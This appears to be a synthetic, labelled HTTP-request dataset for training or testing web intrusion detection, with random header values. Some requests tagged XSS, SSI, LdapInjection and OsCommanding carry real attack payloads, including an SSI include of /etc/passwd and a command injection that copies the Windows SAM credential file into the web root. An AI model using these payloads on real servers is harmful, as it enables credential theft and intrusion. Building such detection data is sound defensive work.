Cookie: Levali3Azc07p=hxKyH;e7mtzdemeWthe=eXH5r;tleshh=dlTwhl;odstt6e=ruea;hBCq=nqrdEvf?psa6sw;aglsOseRtoe43=eWUe
Cookie2: $Version="56"
Date: Mon, 16 Oct 06 08:45:00 GMT
ETag: W/"JeOMB8IEzQqMZ5UXUF"
Expect: 100-continue
From: tdMWtde@lyHrvnefs.fr
If-Modified-Since: Fri, 07 Sep 07 11:36:25 UTC
If-Unmodified-Since: Sat, 14 Oct 06 12:43:03 GMT
If-Match: "zLIYTgnAjGooN39c6ha"
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: omh4 yAzTEa=ty8o
Authorization: NTLM bGVyYXNpZWVhdXRvZGFsUmU2aW5zN29VdE5vb2VvZXNSZXl0YXlhcw==
Range: -843519
Referer: /etwNmitd/dtymaneh/tatAH/hrmm/naqn.shtml
TE: chunked;q=0.4
Trailer: Proxy-Authorization
User-Agent: Mozilla/6.8 (X11; U; Linux i386 6.2; Tw-T1; rv:1.3.3) Gecko/05321055
UA-CPU: Sparc
UA-Disp: 9663,2173,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 8335x3340
Via: rspmf/0.1 www.omfma.png:74630, HTTP/2.8 3.126.114.224, 0.9 4.202.149.5
Transfer-Encoding: identity
Upgrade: asneah/1.8, akhg/1.6
Warning: 345 www.zdydE.js:508 "oogntaebhaEnWh" "Sat, 14 Oct 06 08:34:42 GMT"
X-Forwarded-For: 223.134.122.135
X-Serial-Number: 16212196997401300
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44392
Start - Id: 14232
class: Valid
GET /ntzRtutdetoeotiA/8QS/EIwp-zGRbinM/d8iqU8Z/Y04log/9dzoth/uMWv0.css? HTTP/1.1
Host: www.drAym.net
Connection: hqnofay
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: qoanls0-ht;q=0.5, tonnucr-m;q=0.0, frodsSRe-h6ieeoe, eDaf0l8-tha8, soNs-laehh
Cache-Control: min-fresh=29473
Client-ip: 222.155.249.216
Cookie: EJNftpopenJ.BL=n;vgchut=etxeedgeradt5kumo;Rertcnioy=pqn9cgpwlaeLsalae
Cookie2: $Version="64"
Date: Sat, 02 Aug 08 21:46:04 GMT
ETag: W/"AeZN8RZMmoUH4hCBsnaF"
Expect: 100-continue
From: ytnpe@aitntig.fr
If-Modified-Since: Mon, 13 Mar 06 07:17:45 CET
If-Unmodified-Since: Fri, 16 May 08 16:10:57 GMT
If-Match: "5DD1SVYRO0IIvjj2"
If-None-Match: "KYNXY-6@d0mDjLlTbQ"
If-Range: *
Max-Forwards: 183
MIME-Version: 0.5
Pragma: ettmTg8=lhD
Proxy-Authorization: iAwt ytdeMtan=qbp5ee
Authorization: Basic ZG1kdHI6a3d2a2F6
Range: -901847,5-685
Referer: /tftrzrc/1ddlmhqr/ntWps/omAre/uo87E.mdb
TE: deflate;q=0.0,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/9.5 (Windows; U; Win98 1.8; nh-hh; rv:9.0.0) Gecko/03694678
UA-CPU: MIPS
UA-Disp: 985,925,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 962x171
Via: FTP/2.5 www.na6moiut.png, FTP/9.2 99.145.117.81:599, xvyf/5.1 118.72.239.53
Transfer-Encoding: identity
Upgrade: nemhde/8.2, tex32o/1.6, 6cPmot/5.9, eiypMx/6.4
Warning: 616 154.56.254.74 "ansu3dtaabmzoDoqtefe" 
X-Forwarded-For: 177.22.102.112
X-Serial-Number: 21052565504410930240
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14232
Start - Id: 46572
class: XSS
GET /nBf8FOWXnSpWqW0rYQ/eWVi-4Z2sSzYSNKsGc/pB/e6caeresvnrie6hi/S5ld/o7ePaylWiesCfE/k2Lr0kbqCk5z9odo/nae4stheErnf5lCoa/I0EarutlxpwthAoioto/asie3snihi/hy/divN_1kV5C.mspx?ntohodpt=h2br&zumAwinntB0=iiG8Q&easee4KlllLt=eNm6t&cofldiio1=el5&cgs2lttebmsE5oh=864 HTTP/1.1
Host: 204.28.119.39
Connection: ajac
Accept: */*
Accept-Charset: iso-8859-8, iso-8859-4, x-mac-roman;q=0.0
Accept-Encoding: deflate, deflate;q=0.3, identity;q=0.2, identity, compress
Accept-Language: <form+name=eu ><select+name=Cdh    >http://www.aNwSlt.com/Entt/?</select></form  >
Cache-Control: max-age=71
Client-ip: 140.154.179.232
Cookie: asedevuourst=Eo;RtMeekK=po8urm6fiNacritt
Cookie2: $Version="1"
Date: Mon, 06 Jul 09 06:20:48 UTC
ETag: W/"j-GvuB-Y6UUJL8q3fp"
Expect: oai0tt
If-Modified-Since: Fri, 21 Sep 07 08:57:44 UTC
If-Unmodified-Since: Thu, 26 Jul 07 12:13:29 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 02 Dec 08 10:09:56 UTC
Max-Forwards: 3
MIME-Version: 3.9
Pragma: q1we='mludrnf'
Proxy-Authorization: NTLM ZW5sbjJUbW1uaGhjbUxoY3I1aTR0NmNqZG41b2pzaG55
Authorization: Digest realm
Range: 70-
Referer: /uTbtThLi.nsf
TE: deflate,trailers,trailers
Trailer: If-Match
User-Agent: nt7dnelndjA
UA-CPU: PowerPC
UA-OS: Win98
UA-Color: color16
UA-Pixels: 5605x1554
Via: 1.5 2.25.31.149, 9.3 65.91.116.162, 1.1 18.119.99.179:9
Transfer-Encoding: compress
Upgrade: ieek/6.0, 9suhri/7.2, tEdUn/4.8, nen3O/8.2
Warning: 061 www.jmFttlrn.js "lnQacp2ufeTocbi0I" 
X-Forwarded-For: 222.189.31.195
X-Serial-Number: 70953324571970
----: ---------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 46572
Start - Id: 40897
class: SSI
GET /ii7syitqN2s3aceil/tyZN1Bg@Eee5A.xyR/fXLwe.png?cxLXg=bodynliker&98aacwqwteheb=%3Cenode%3D%3A&tliwoMoiesbBwsi=%3C%21--+%23odbc+statement++%3D++%22select++xo%2C+to5lW%2C+++tyltlhl++++from+++sNoa+++++order+++++by+++++6%2C+++++48%2C+++3%22++--%3E&niLseOn=48262422 HTTP/1.0
Host: www.psrme.fr
Connection: close
Accept: text/xml;q=0.2, application/*;q=0.3
Accept-Charset: windows-1253;q=0.1, utf-8;q=0.0
Accept-Encoding: compress, identity;q=0.5, gzip;q=0.7, compress
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 180.221.196.37
Cookie: ohK5dO=ptaaO>;Da8ob=oe$ 1gEz9nAAy
Cookie2: $Version="350"
Date: Wed, 02 Apr 08 18:45:08 GMT
ETag: "GRCzclJasRqBalTu"
Expect: 100-continue
From: 2cEq@o7ggnio.cz
If-Modified-Since: Fri, 07 Aug 09 04:00:05 GMT
If-Unmodified-Since: Tue, 10 Jan 06 14:03:10 UTC
If-Match: "6BLVnQdT-ikd96ol6s"
If-None-Match: *
If-Range: Sat, 09 Aug 08 11:36:45 CET
Max-Forwards: 296
MIME-Version: 4.6
Pragma: rdsa5='e'
Proxy-Authorization: NTLM b3Bpc295VHpvc2syNGxlZkV3aGlhbmVuZTVlYmh0b3RzenI=
Authorization: atU2Eo WrSxS=eOald
Range: 776-,-33080
Referer: http://www.eveulb.be/dbse/osai/0elrcfbi/b5ite/tfr6i.mpg
TE: deflate
Trailer: If-Unmodified-Since
User-Agent: 4IOie0 http://www.repnx.biz
UA-CPU: PowerPC
UA-Disp: 8926,1457,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5993x410
Via: HTTP/6.6 100.7.237.22:880
Transfer-Encoding: identity
Upgrade: fmoaA/7.1, wyse3a/5.5, tlee/2.8, eejrdw/0.2
Warning: 603 www.e2tt.jpg:323 "reecdaeesselriRoe" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 821981271525659
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40897
Start - Id: 33053
class: Valid
POST /pij8aptNoiastosAbeu/5rEMyL7K65wz4T/MOyjExmetanqI-P8hL/oK.4ZNwfbid/iReq/W5D6eju_/euNs4.5GtgOHC9k4/2Jh/yanuabreeyeiuehensl.exe? HTTP/1.1
Content-Length: 281
Content-Language: ra
Content-Encoding: identity
Content-Location: /l0htrd6/mreoh7/atnoii.mdb
Content-MD5: b2EzM3JpaW1pdmFDaXRhYw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 03 Jun 04 18:51:57 UTC
Last-Modified: Fri, 08 May 09 05:30:38 UTC
Host: 87.210.185.12
Connection: dwstop0
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=647
Client-ip: 177.176.66.65
Cookie: doem=&ttsthail syn);rfcuuudnr=aeRC;LqEeK@c@H=Nl0naht3Oe;VsiwlQRsD=iinabdtelnetd
Cookie2: $Version="330"
Date: Sun, 01 Apr 07 03:04:10 UTC
ETag: W/"As0LcvoUuun5lol"
Expect: 100-continue
From: ekecyvb@mao43ira.ch
If-Modified-Since: Fri, 28 Sep 07 21:26:52 GMT
If-Unmodified-Since: Fri, 25 Jan 08 01:10:24 CET
If-Match: "dkTLCzdkKKW5mTxiLL.T"
If-None-Match: *
If-Range: Fri, 11 Sep 09 04:31:43 GMT
Max-Forwards: 457
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: NTLM NGlsZm91dDJhaUVhcFdpTGVlYWt0dXQycnlvb29kaVRuYnR6N3Ruc29jNzJ6c3Np
Authorization: tePufn fsvo=e5dtuni
Range: 905-
Referer: http://www.doaweg80.net/rhhir/Hree/Nohaetr/i2uosg.php3
TE: gzip;q=0.5
Trailer: If-Match
User-Agent: Mozilla/2.2 (compatible; msknsnytl; Win 9x; mmetwnrme)
UA-CPU: StrongARM
UA-Disp: 287,078,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 3468x969
Via: Mdl2/2.8 212.96.252.197:4805, HTTP/9.7 www.eteeUc.gif
Transfer-Encoding: gzip
Upgrade: 4uj9o/6.8, EeJa/6.5
Warning: 736 www.lahs.html "l5dms6ihNxeatce" 
X-Forwarded-For: 191.96.126.252
X-Serial-Number: 71160
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

itl2ooevheole=o@pstrer a-+&sIkchenhsydT=a Qdt&6mrsIvrr4n8os=av9enRbrd7 Mne6a&wneixahrie49=edwi:tten&access_log0xYE=t-1xv&mjoaY3Enr=no:a6qs@hoeqcaUv&7Sb=y09tamy1s6&cRwnieitgOn3sOi=4idnwyst&nnn=1558449&kaA5EHe=ewhra&aCFuvfs=358&3fjjz=53423&hnhyai7etI=/eNa7nrkt&eseAry=408

End - Id: 33053
Start - Id: 29464
class: Valid
GET /XVhFAW.tiff?enMjh7bideTsnlr=2635971&sjsvE=b%25f9h6&B@-copyuFh=ae.WD-U1%40FAS&neapoidgotPigJe=5320123&egsmtseTlgdo=mjlAetHEu1tob&ct6q=s%2BwEm5z&deicgbaeacfo=00673963&eienjeqH7epE=%5Ddhb HTTP/1.1
Host: www.oieYp9da.cz:84045
Connection: keep-alive
Accept: image/*, application/*
Accept-Charset: isiri-3342, macintosh;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 116.170.163.175
Cookie: ts-XUJUXU=cc@SXnGY;ir=168810134;euoie5eRdaoi=n tmadmine65he;r1amnu=nn8lzX0Ts;@B@DacceptT49htacces=44092;Cnitbgda=iiuskls3intrzt16
Cookie2: $Version="749"
Date: Sat, 31 Dec 05 20:11:22 UTC
ETag: "xLrsNsTOPTUionq"
Expect: mtsvart=rtdaer;Ajtt4Ne=ndsnet5
From: 3eefJz@tepiieo.org
If-Modified-Since: Sat, 13 Sep 08 10:30:45 CET
If-Unmodified-Since: Wed, 01 Jul 09 04:23:33 CET
If-Match: *
If-None-Match: "pmyzIbzL9D8RBwv7tmuS"
If-Range: Thu, 02 Jun 05 19:34:57 UTC
Max-Forwards: 7773
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: oesya nAdau=xhbeoav
Authorization: NTLM YXI0b3duY2huZXNCYXNudG9penkyeG1iM3Vod2RPZXZpdGhrZGVz
Range: 79719-,-15,5725-6080
Referer: /tt3uss/dagle/tneaoe/snftnr/ttgs.zip
TE: gzip
Trailer: From
User-Agent: eMba0ET.Rz http://www.iTrs.it
UA-CPU: Sparc
UA-Disp: 206,807,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 6889x7208
Via: 3.2 187.167.192.13:960, FTP/3.7 252.143.94.50, HTTP/8.9 46.67.193.133
Transfer-Encoding: compress
Upgrade: s1t2mc/5.1, ien6g/6.9, eou/7.3, wnt/9.2, inbt/4.4
Warning: 434 www.3rmtd.png "yvs9tz" "Fri, 05 Aug 05 19:35:36 GMT"
X-Forwarded-For: 160.172.24.250
X-Serial-Number: 801273405
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29464
Start - Id: 19034
class: Valid
GET /uAF6s/mhttpbS3AlinkDposition/nyhfwIy/noieligvsii7a3/t-GN-n0QmXO.asmx?oni9snflueIsae=975717&@fRACstyle0MbF=4471859042&cmoeiiwe=50724563 HTTP/1.1
Host: www.eMmouVlo.cz
Connection: close
Accept: audio/x-wav, image/png;q=0.1, text/*;q=0.6
Accept-Charset: windows-1258
Accept-Encoding: identity
Accept-Language: bse-n, coa-lfezni;q=0.1, de7i-rieab, msu-tteei;q=0.1
Cache-Control: max-age=70
Client-ip: 81.216.134.74
Cookie: TlQHz=euntftrsstuonr;_GPkkj=14973731;wr6eti= drne;2looxd=6362616
Cookie2: $Version="578"
Date: Thu, 16 Nov 06 02:32:19 UTC
ETag: "bIU1Kb-eMwWtUQP8MrHT"
Expect: 100-continue
From: aattwww@nt6s.org
If-Modified-Since: Wed, 16 Mar 05 01:04:12 UTC
If-Unmodified-Since: Thu, 25 Sep 08 20:02:12 GMT
If-Match: *
If-None-Match: *
If-Range: "K141f07cJVU1jrf"
Max-Forwards: 6
MIME-Version: 0.1
Pragma: ic='rtoipc'
Proxy-Authorization: NTLM ZWxlbnJhbjRoZmdvcndzYm9yNGRuYUl1dXR3aDdlMWlwdGh0ZWE=
Authorization: NTLM a2VnNXRvc2VhZmV0aXdkdHJldGFlclZoYXRpT2FEYXkzZW50aWU=
Range: 54-5644,-3175
Referer: http://www.EPoosMHi.com/rhaeemla/s4ooae/Hbedis4/cfaiuaop/eos7.msf
TE: chunked,trailers
Trailer: If-Match
User-Agent: Mozilla/0.8 (X11; U; Unix 6.2; la-ns; rv:7.2.5) Gecko/67610012
UA-CPU: MIPS
UA-Disp: 0090,6140,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 654x721
Via: HTTP/6.5 www.seiintoe.js, eqoo3/2.1 215.35.199.152
Transfer-Encoding: identity
Upgrade: e60/6.4, Dojen/4.5, 8latt/8.3
Warning: 116 170.222.10.170:68 "t5ueaspsrUFecey" "Tue, 17 Nov 09 03:08:22 GMT"
X-Forwarded-For: 144.31.247.88
X-Serial-Number: 27260320301
----: ---------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 19034
Start - Id: 23842
class: Valid
GET /nga08/n.Cnd99XvB/tMyY-4iO4UYn@Pp6wjjz/r-vj4x39-KXdkqBD/ZF7Xzl5ZUwcBvWU.htm?ttyetho5crnsiti=i%3Cb&47ye6a9emk5n=3023882107&XmLyetsE63=6a4hp%7CaPbs&Xnetcatkbb0ctDsystemand=3nnU%242ght&b2nersthaim=s&hgw5qatred0an=c1cpceU&K4OyG=0527836&nagdotrF=hbimR0nar&s3nhixee3mco=sgGDhRbH8As&sht1oSt=1920227989&dvarC29PzpIfkinput=lengLows&lsRusrV5Xa6=dhyet&rede42=3e2eelefn&e2wEati3pf1k=z3awherecatbT4+de%3Ft%25Ig HTTP/1.0
Host: www.ernLes.fr
Connection: close
Accept: audio/*;q=0.1, text/plain;q=0.0
Accept-Charset: x-mac-cyrillic
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-stale
Client-ip: 158.198.144.188
Cookie: geitOi=eYoestechild4e;dtfawhtrpMsa=mo1s2rxnTq8j>t0 ;epoy8tni2=rNnsI
Cookie2: $Version="6"
Date: Sat, 22 Mar 08 15:26:09 GMT
ETag: W/"dfqaqFIU1iKL1l_Ns"
Expect: f7t2=uhanHl
From: iaaodun@atohoee.uk
If-Modified-Since: Sat, 29 Oct 05 17:13:38 UTC
If-Unmodified-Since: Wed, 14 Jan 09 02:38:22 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 01 Feb 06 03:00:49 CET
Max-Forwards: 147
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: NTLM aWF2NExDcml1YW9TaTRhcGV5RXBlYXNpdGR1ZWQyZGFhYWlpN29nVGlT
Authorization: Digest cnonce="w4n7b"
Range: 241-54372,-12122,-63
Referer: /Aiueagxv/uexemCe/ooe5.cgi
TE: chunked,trailers
Trailer: From
User-Agent: Mozilla/9.2 (X11; U; SunOS sun4u 1.6; eD-bt; rv:7.4.0) Gecko/37365865
UA-CPU: PowerPC
UA-Disp: 5960,788,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 1738x3451
Via: 2.5 www.sOatu.html
Transfer-Encoding: deflate
Upgrade: odi/2.0
Warning: 295 www.crcst0oT.png "dusoeoAdhnzaeht4at" "Mon, 07 Sep 09 24:26:21 UTC"
X-Forwarded-For: 223.106.91.27
X-Serial-Number: 119652447524751
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23842
Start - Id: 37274
class: LdapInjection
POST /koaWr/n76@6/stamhvhmrarybWd/zEr@gQeapT1TpS/pI@9kwhZ./ichbaYfQ@Bb/O-oqf3B7V/ltUTg5S-Agw/dnudcsasSTiar/8ao5lndmireotha/SanasklonOmziirol.cgi? HTTP/1.0
Content-Length: 207
Content-Language: 57,otinTro,aegecel
Content-Encoding: identity
Content-Location: /ueqe/acda/ktes/yMuiTa/eeraor.msf
Content-MD5: c3NmbmpsZmU2eHNQdG50dg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 23 Oct 08 20:43:20 CET
Last-Modified: Thu, 18 Oct 07 14:04:19 CET
Host: 71.13.196.221:66190
Connection: iSae
Accept: image/*, application/rtf;q=0.3, audio/*
Accept-Charset: *;q=0.3
Accept-Encoding: mn)(&(objectClass  =  nTus*)
Accept-Language: e-Bfegjptk;q=0.7, g2zemee-hEl;q=0.2
Cache-Control: no-store
Client-ip: 110.248.121.211
Cookie: hki2TOhAhr=D\copy;kXg3gWJeHLXX=6180691;teaehamstlharv=Nexec<nn]h3ar winntwmail
Cookie2: $Version="96"
Date: Wed, 01 Jun 05 13:39:52 GMT
Expect: uecft0
From: us0iolso@onRdui.com
If-Modified-Since: Sun, 04 Dec 05 05:17:48 CET
If-Unmodified-Since: Sun, 17 Jul 05 10:32:49 GMT
If-Match: "-L.NukSExuIvJH2"
If-None-Match: "PhbE5v@WCf5uz009"
If-Range: Fri, 25 Sep 09 09:35:19 UTC
Max-Forwards: 231
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: NTLM bjlyaTdodGlzZTV1ZWxOdHJ1ZDZ4dTRucjM2bnNpd2xnb3RWZWVyZ21hbnQx
Authorization: Basic bmVhZzppYW5zdw==
Range: -3,40874-059856,-5
Referer: http://www.leoAS.org/g01m/osu0/cwnai.rar
Trailer: TE
User-Agent: a9c3crmsB/8.8.5.1
UA-Color: color32
Via: FTP/5.0 216.60.151.133, FTP/3.3 www.lnuetg.jpeg
Transfer-Encoding: deflate
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nif=3734044319&usrOXggD=839&Nlw3nreaie=aie&kYbSRVU=64&dine6tiso=e8noXefttOtysasrz&htezah7rm6fntke=580&.Bdk7DTnYTn=ibndre&tutprdosafefab=mRbaln&N0CKCA4u9Yu=hs&sf=<fnOorydE7s wheremspiT<&9a7nh=Rihfromobtle

End - Id: 37274
Start - Id: 13181
class: Valid
GET /aKzXi-6yjpb0mi/n.t_.v92BGCeAc/0hbmHKin2M/hss56hap8rmei/AetdetiMatoriit/t3V6XuYYkVe7Nq0M/uSp/s_KI/nahubrhf1eo8emLa7An9/FZlO.cgi?On=58&_VdivQPhtaccesLjJXcc=ienFasw&tekogoiaanya=bfiabnJgd688o&a7t=550&flxnar=tiLr6iwv4yp&enuoil=sJ%29document&toe=snn&erFstquTieot=st&4Sto7m=l%3Fftvar&mALUSnFKstdine4W=tdawc%3E%7CAmdCemeas8iupdate&2ssy=313411555&ad3f3sera=homedeletenl HTTP/1.0
Host: www.ekcoEEomq.de:80
Connection: epajd
Accept: application/*;q=0.8
Accept-Charset: windows-1255
Accept-Encoding: *
Accept-Language: mtazli-xtur
Cache-Control: no-transform
Client-ip: 132.243.228.86
Cookie: eloicmo=2ZZ@ob;wyasuBdyeRle=shadmin?;boLeipi7hrtgn=dldo2opena;bEJB3hyNwinntc9=union0dtcmdo;7qv@dsock_streamV=7515751684;li=12904974
Cookie2: $Version="095"
Date: Thu, 19 Nov 09 01:29:19 GMT
ETag: "QXLNmY8sC4Rer90taM"
Expect: rf7Aybh
From: eswp2a@SmynxY.com
If-Modified-Since: Mon, 13 Sep 04 01:01:15 CET
If-Unmodified-Since: Fri, 14 Mar 08 24:09:58 GMT
If-Match: "vSzENbh5ftNEzoI60la"
If-None-Match: *
If-Range: Tue, 20 Mar 07 13:49:12 GMT
Max-Forwards: 39
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Basic Zm5vdWE6b3R4dHM=
Authorization: NTLM a2Q0c3I0ZVVvZW5tZ0VvcWFyaWluc2RzdW8xdHdlbmg2
Range: 45-17033,2056-83
Referer: /Ecmroo7c/rnbqo3e/nahgo/iaristl/i0et.swf
TE: trailers,gzip;q=0.4
Trailer: From
User-Agent: Mozilla/9.2 (Windows; U; Win98 8.0; ol-on; rv:5.9.6) Gecko/71306435
UA-CPU: Sparc
UA-Disp: 185,098,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 6456x555
Via: 2.9 www.rwnbteo.css, 0.8 www.awgeRyS.jpg, 9.4 98.14.251.74
Transfer-Encoding: deflate
Upgrade: skn/0.2, ttri5f/7.5, Xl2hi/6.4, lre/8.6
Warning: 183 2.31.82.140 "EmePDtapnntrh" "Wed, 06 Jun 07 03:28:08 UTC"
X-Forwarded-For: 250.149.217.157
X-Serial-Number: 82100256836
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 13181
Start - Id: 22340
class: Valid
GET /vy@DIGhCY@4X25/gTDYI.cgi?ftd5Me7SOS=rl2ltSr1&ehLhaelcp4c4=aR.8zrQWZG&Ti1Di5=ie&bgsoundE3replace=sDrD&9tehadS=rYHVjZrj&UeebTrMuD=9+asaiea%2F&nhm7KzJg1Fzk=284&sfee=zYQo5S9va6JP&tchc=nmcTbi%3Df+i%3D%7Ce%40%27%27etc%2B&hj=082 HTTP/1.0
Host: www.9mmenfod.be:31166
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.6
Cache-Control: min-fresh=2230
Client-ip: 186.185.1.249
Cookie: halmbg3slriti=tFrpfZOGy;oer0ck=2839427;mtzeag7tei=sdocumente dUp;lkXM=an(bree@'exec2I;dl6ut=eIRiHbmvrR
Cookie2: $Version="8"
Date: Sat, 24 May 08 08:10:54 GMT
ETag: W/"lHVx_e.CMm9IOvVHpR"
Expect: tatnb8n=ndennoq
From: iHpsna2i@sBsaOrTep.ch
If-Modified-Since: Sun, 22 Oct 06 05:14:49 UTC
If-Unmodified-Since: Thu, 23 Dec 04 02:40:45 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 13 Apr 04 01:35:02 UTC
Max-Forwards: 879
MIME-Version: 9.4
Pragma: 6a4telz=dh4u
Proxy-Authorization: NTLM Y2lsaXZtY3JodGlycWRpbXJvbjNrUmVhaGRkbGxob2FzOXNkczI=
Authorization: nEdlg ewhdnmb0=8uorRDjs
Range: 562648-,892394-
Referer: /L3raal/lnactot/2fdele.pdf
TE: deflate;q=0.5
Trailer: Accept-Language
User-Agent: Mozilla/6.0 (Windows; U; Win 9x 2.7; ne-ya; rv:3.0.4) Gecko/93202755
UA-CPU: 68000
UA-Disp: 6322,2576,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 254x8392
Via: aeasy/5.7 www.1isrooer.css, FTP/3.8 www.sStTT.jpg, 6.8 www.dq1toiue.tiff
Transfer-Encoding: identity
Upgrade: ujhe/8.0, pws/9.8
Warning: 187 www.lgNd.js "oZ2fltasalsapdudt" "Wed, 22 Oct 08 15:49:21 CET"
X-Forwarded-For: 81.163.55.171
X-Serial-Number: 8809830
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22340
Start - Id: 42886
class: OsCommanding
GET /teeo/4o6LDP/t8PKr8Ec/Esmiq0c/t3/ytnVOfe4lndrelD/hi53g/34gvps1MujD5.gif?PbVHBJ=irheaMEuonnh&rpo9e=copytr1phqtll&tttC8m=hq4m8&ulrohinoy=w%2F%3Dt0nullEtts3nt9&nilo=8317118&lnezte0tetn=137&aue6hireE=%3Eeij&aiyn5ysw=sP9kHVpl3kU&net8syGueaeue=3&eo0atp0nAhs5e=27.62.109.150+%7Ccopy+c%3A%5Cwinnt%5Crepair%5Csam._+c%3A%5Cinetpub%5Cwwwroot%5Csam.ddd&rerxeanhngeups=+gshaving HTTP/1.0
Host: www.lnbcnjm.be
Connection: kcbnEee
Accept: */*;q=0.0
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: h-DvantsR;q=0.9
Cache-Control: max-stale=9
Client-ip: 96.55.27.134
Cookie: dFbUmocha=379;eor6edU04ahimtf=raef;cioToot=59730645
Cookie2: $Version="1"
Date: Sat, 27 Aug 05 12:02:37 CET
ETag: "Wp7NOJ9WHkU4s9jlY"
Expect: tlgm
From: n2zse0bo@tibsA.uk
If-Modified-Since: Wed, 16 Nov 05 22:05:02 GMT
If-Unmodified-Since: Sun, 27 Jan 08 12:10:25 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 22 Apr 10 20:29:19 CET
Max-Forwards: 8637
MIME-Version: 9.3
Pragma: unf=lUwhyeeg
Proxy-Authorization: NTLM aWRkcWhsaTFkaDVIc2pvZXNoc3J0cmVzeHlldWVCeWVzbg==
Authorization: dyuae ideolaua=dtuainn
Range: 34480-7538,5879-,186-597
Referer: /le5e9oec/ioNlfEim/5wfOgAb.sh
TE: trailers,trailers,trailers
Trailer: Upgrade
User-Agent: wt2o1nyr/4.3.3.3
UA-OS: Win98
UA-Pixels: 4835x5695
Via: 4.2 104.99.53.44, HTTP/1.9 www.sd1tt.html
Transfer-Encoding: deflate
Upgrade: dal3ei/8.1, medohh/7.9, vcief/8.1, tln78a/9.5, fsssme/7.1
Warning: 973 www.a2Mltbl.jpeg "ycengdeih" "Sun, 20 Nov 05 15:07:42 CET"
X-Serial-Number: 7523333494346880207
----: -----------------------------------------------

null

End - Id: 42886
Start - Id: 39819
class: SSI
GET /zKtGVczlsTJ0a/ONTND/sanmdceFL8ajiR/etc3XkEuIHa65.Wq/sGgja6CCPm/4LZsmqX957g3b/o6vXWYfv/hUFScNJn/lr0pisd/lHp.lG/tNeZTp@r1vc8/ftbtaiswtrlrirza.gif?nenaJnt=sYO4sAcM6u&nEIIusrUfQWgtQ=esrT74Cewbs&hwErdeuo=rfSt&io=180&gEe=e%40ysciframevar0%3BOenen&6saW7rt=tltbelhneooyne&Pduencoso=552&w1eetd=aKMhIa&waao=%3C%21--%23include+++++virtual%3D%22%2Fetc%2Fpasswd%22--%3E&e8edoeb=li%24libmrrps%28Oruaea HTTP/1.0
Host: www.nuh7Nhrslh.de
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: x-mac-arabic;q=0.1, cp-936;q=0.1, windows-1251, isiri-3342
Accept-Encoding: compress;q=0.3, compress;q=0.9, deflate;q=0.6
Accept-Language: *
Cache-Control: max-stale
Client-ip: 179.116.196.3
Cookie: oLUxconnectnetcat4Xbgsoundcbj=3l7zjRB-fP3;SSseg8pe2K=379;9ho5sietoT=$bhonufuflr setolaccepto;hkOscriptjZo=665
Cookie2: $Version="15"
Date: Tue, 07 Feb 06 10:37:58 UTC
ETag: "ay_ewtMOxJLhLfPq-YRu"
Expect: rsGesn
From: fEkbo16t@uycIttryA.biz
If-Modified-Since: Sun, 05 Nov 06 19:33:22 UTC
If-Unmodified-Since: Sat, 01 Nov 08 02:31:46 UTC
If-Match: *
If-None-Match: "Nmc-0ouB@UgzXstw9tsc"
If-Range: "2Ugq-80Yl2a7bSU"
Max-Forwards: 27
MIME-Version: 9.0
Pragma: Psish=e2susee
Proxy-Authorization: Basic aWJlejJFUGk6dWVibGV3
Authorization: taxs reahho=t9eaicne
Range: 907419-6,527-485395,5-64
Referer: /hlmaos.gif
TE: trailers,gzip,trailers
Trailer: Connection
User-Agent: tdeU/8.5.5.4
UA-CPU: Sparc
UA-Disp: 052,114,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 9632x079
Via: 9.4 232.33.104.2, FTP/0.7 87.1.80.182:9
Transfer-Encoding: gzip
Upgrade: oLt/5.9, tEgb/6.9, 6laet/2.7, faare2/0.4, vst20/6.5
